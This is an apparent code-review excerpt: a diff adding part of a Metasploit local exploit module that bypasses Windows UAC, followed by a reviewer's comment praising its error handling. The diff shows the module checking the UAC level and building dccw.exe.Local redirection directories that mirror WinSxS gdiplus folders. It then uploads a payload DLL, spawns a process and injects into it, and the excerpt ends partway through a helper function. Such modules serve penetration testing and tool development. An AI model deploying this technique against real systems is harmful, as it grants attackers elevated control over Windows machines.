modules/exploits/windows/local/bypassuac_injection_winsxs.rb

```diff
@@ -0,0 +1,389 @@
+        standard technique. However, it requires the correct architecture to be
+        selected, (use x64 for SYSWOW64 systems also).
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'Ernesto Fernandez "L3cr0f" <ernesto.fernpro[at]gmail.com>'
+        ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'References'    => [
+        [
+          'URL', 'https://github.com/L3cr0f/DccwBypassUAC'
+        ]
+      ],
+      'DisclosureDate'=> 'Apr 06 2017'
+    ))
+
+  end
+
+  def exploit
+    # Validate that we can actually do things before we bother
+    # doing any more work
+    validate_environment!
+    check_permissions!
+
+    # Get all required environment variables in one shot instead. This
+    # is a better approach because we don't constantly make calls through
+    # the session to get the variables.
+    env_vars = get_envs('TEMP', 'WINDIR')
+
+    # Get UAC level so as to verify if the module will be successful
+    case get_uac_level
+      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+        fail_with(Failure::NotVulnerable,
+                  "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
+        )
+      when UAC_DEFAULT
+        print_good('UAC is set to Default')
+        print_good('BypassUAC can bypass this setting, continuing...')
+      when UAC_NO_PROMPT
+        print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+        shell_execute_exe
+        return
+    end
+
+    dll_path = bypass_dll_path
+    payload_filepath = "#{env_vars['TEMP']}\\dccw.exe.Local"
+
+    # Establish the folder pattern so as to get those folders that match it
+    sysarch = sysinfo['Architecture']
+    if sysarch == ARCH_X86
+      targetedDirectories = "C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_*"
+    else
+      targetedDirectories = "C:\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_*"
+    end
+
+    directoryNames = get_directories(payload_filepath, targetedDirectories)
+    create_directories(payload_filepath, directoryNames)
+    upload_payload_dll(payload_filepath, directoryNames)
+
+    pid = spawn_inject_proc(env_vars['WINDIR'])
+
+    file_paths = get_file_paths(env_vars['WINDIR'], payload_filepath)
+    run_injection(pid, dll_path, file_paths)
+  end
+
+  def bypass_dll_path
+    # path to the bypassuac binary
+    path = ::File.join(Msf::Config.data_directory, 'post')
+
+    sysarch = sysinfo['Architecture']
+    if sysarch == ARCH_X86
+      if (target_arch.first =~ /64/i) || (payload_instance.arch.first =~ /64/i)
+        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
```

Comment:
Good use of fail_with and Failure codes here too. Another good example for "what to do" when writing modules here.